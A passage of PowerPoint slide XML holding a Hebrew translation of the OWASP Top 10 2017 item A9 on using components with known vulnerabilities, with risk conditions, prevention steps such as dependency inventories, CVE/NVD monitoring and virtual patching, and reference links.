              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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במידה והתוכנה פגיעה, בלתי נתמכת, או לא עדכנית. הדבר כולל את מערכת ההפעלה, שרת האפליקציה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, מערכת ניהול בסיס הנתונים, היישומים, ממשקי הפיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) וייתר המרכיבים, סביבות הריצה וספריות הקוד.</a:t>
            </a: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במידה ואינך מבצע סריקות למציאת חולשות בצורה קבועה ונרשם לקבלת מידע אודות חולשות אבטחה במרכיבים אשר בשימוש.</a:t>
            </a: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במידה ואינך מעדכן או משדרג את הפלטפורמה, מסגרות העבודה, וייתר התלויות אשר בסיכון, בזמן סביר. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדבר קורה בעיקר בסביבות אשר עדכוני אבטחה מותקנים על בסיס חודשי או רבעוני כמשימה תחת אחריות בקרת שינויים, דבר אשר מותיר ארגונים חשופים במשך ימים או חודשים ללא טיפול בחולשות אבטחה.</a:t>
            </a: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במידה ומפתחים לא בודקים תאימות של עדכונים, שדרוגים או עדכוני אבטחה בספריות קוד.</a:t>
            </a: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במידה ואינך מאבטח את הגדרות מרכיבי המערכת (ראה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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9"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V1 Architecture, design and threat modelling</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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10"/>
              </a:rPr>
              <a:t>OWASP Dependency Check (for Java and .NET libraries)</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Map Application Architecture (OTG-INFO-010)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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12"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Best Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצונית</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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13"/>
              </a:rPr>
              <a:t>The Unfortunate Reality of Insecure Libraries</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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14"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures (CVE) search</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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15"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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16"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript libraries</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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17"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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18"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>צריך להתקיים תהליך עדכוני אבטחה על-מנת:</a:t>
            </a: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להסיר תלויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במרכיבים אשר אינם בשימוש, יכולות מיותרות, רכיבים, קבצים ותיעוד</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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לנהל רשימת מלאי של גרסאות רכיבי מערכת בצד הלקוח ובצד השרת (לדוגמא מסגרות עבודה, ספריות קוד) וכל התלויות באמצעות כלים כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ועוד. נטר בצורה שוטפת מקורות כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אחר חולשות במרכיבי המערכת. השתמש בכלים ניתוח תוכנה על-מנת למכן את התהליך. הרשם להתראות בדואר אלקטרוני אודות חולשות אבטחה הקשורות לרכיבים אשר בשימוש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>השג רכיבי מערכת ממקורות ידועים תוך שימוש בתקשורת מאובטחת. העדף חבילות תוכנה חתומות על-מנת לצמצם את הסיכוי להוספה של רכיבים זדוניים.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>נטר ספריות או רכיבים אשר לא מתוחזקים או רכיבים ללא עדכוני אבטחה לגרסאות ישנות. במידה ולא ניתן לבצע עדכוני אבטחה, שקול את השימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לניטור, זיהוי או הגנה מפני בעיות שהתגלו.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כל ארגון חייב לוודא כי קיימת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תוכנית</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לניטור, סיווג והפצת שדרוגים או שינוי הגדרות בכל מחזור חיי היישום.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>  שימוש </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>ברכיבים </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בעלי </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
